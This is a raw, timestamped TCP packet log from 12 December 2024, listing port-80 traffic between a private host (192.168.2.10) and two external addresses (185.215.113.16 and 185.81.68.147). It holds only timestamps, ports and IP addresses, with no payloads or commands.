Dec 12, 2024 16:48:47.104264975 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.104312897 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.104370117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.104417086 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.105062962 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.105098963 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.105190039 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.105223894 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.106071949 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.106101036 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.106116056 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.106129885 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.107033968 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.107075930 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.107137918 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.107173920 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.107995987 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.108036995 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.108095884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.108133078 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.109005928 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.109040976 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.109266043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.109297991 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.109963894 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.110001087 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.110398054 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.110440016 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.110929966 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.110968113 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.111041069 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.111076117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.111951113 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.111995935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.112415075 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.112459898 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.112875938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.112919092 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.113074064 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.113106012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.113907099 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.113934040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.113946915 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.113966942 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.114871979 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.114912033 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.114979029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.115016937 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.115899086 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.115938902 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.115993977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.116033077 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.116813898 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.116863012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.116935015 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.116974115 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.117786884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.117832899 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.118670940 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.118715048 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.118802071 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.118813992 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.118838072 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.118855953 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.119704962 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.119746923 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.119940996 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.119980097 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.120723009 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.120763063 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.120764971 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.120800018 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.121673107 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.121716976 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.121726990 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.121762991 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.122667074 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.122719049 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.122761965 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.122798920 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.123671055 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.123719931 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.124033928 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.124077082 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.124655008 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.124670029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.124700069 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.124713898 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.125688076 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.125737906 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.125766039 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.125802040 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.126669884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.126714945 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.127111912 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.127154112 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.127540112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.127583027 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.127816916 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.127856016 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.128597021 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.128634930 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.128869057 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.128901958 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.129508018 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.129545927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.129894972 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.129933119 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.130461931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.130497932 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.131557941 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.131570101 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.131581068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.131603956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.131619930 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.132410049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.132452011 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.133426905 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.133440018 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.133450985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.133472919 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.133497000 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.133497000 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.134386063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.134429932 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.135065079 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.135101080 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.135426044 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.135462999 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.135642052 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.135684013 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.136385918 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.136425018 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.136511087 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.136547089 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.137320042 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.137356997 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.137499094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.137542009 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.138339043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.138381958 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.138412952 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.138448954 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.139322996 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.139362097 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.139452934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.139488935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.140269041 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.140321970 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.140521049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.140554905 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.141211033 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.141256094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.141257048 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.141290903 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.142206907 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.142231941 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.142254114 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.142271996 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.143249035 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.143294096 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.143465042 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.143506050 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.144146919 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.144196033 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.144277096 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.144315004 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.145139933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.145184040 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.145299911 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.145342112 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.146148920 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.146200895 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.146867037 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.146915913 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.147072077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.147109985 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.147150040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.147185087 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.148035049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.148086071 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.148165941 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.148204088 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.149036884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.149049997 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.149101973 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.149101973 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.149189949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.149199963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.149298906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.149687052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.149806976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.149872065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.149990082 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.150027037 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.150707006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.150816917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.150882959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.151721001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.151844025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.151913881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.152750015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.153434992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.153512001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.153745890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.153810978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.153883934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.154819965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.155165911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.155241966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.155848026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.155864000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.155939102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.156800985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.157597065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.157676935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.157809973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.157895088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.157960892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.158871889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.159039021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.159100056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.159915924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.160012960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.160078049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.160864115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.160993099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.161053896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.161967039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.161978960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.162050009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.163137913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.163150072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.163218021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.163959980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.164154053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.164215088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.164941072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.165051937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.165113926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.165998936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.166135073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.166208029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.166954041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.167217970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.167289019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.167954922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.168076038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.168148994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.169004917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.169017076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.169081926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.169974089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.170200109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.170272112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.170990944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.171145916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.171221018 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.172000885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.173084021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.173132896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.173144102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.173161983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.173176050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.174074888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.175240993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.175251961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.175266027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.175324917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.175657034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.176100969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.176311970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.176393986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.177125931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.177228928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.177299976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.178183079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.178231955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.178299904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.179174900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.179348946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.179419994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.180174112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.181219101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.181230068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.181241035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.181298018 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.181580067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.182203054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.183269024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.183279991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.183319092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.183352947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.183660030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.184267044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.185236931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.185246944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.185266018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.185308933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.185323954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.186228991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.187028885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.187103033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.187262058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.187278986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.187341928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.188270092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.189287901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.189300060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.189323902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.189357042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.189379930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.190279007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.190332890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.190406084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.191329002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.191941977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.192008972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.192446947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.192461014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.192527056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.193408966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.193418980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.193484068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.194418907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.194430113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.194525957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.195414066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.195425987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.195501089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.196389914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.197431087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.197441101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.197460890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.197504997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.197523117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.198419094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.199465990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.199476957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.199487925 CET	80	49946	185.81.68.147	192.168.2.10
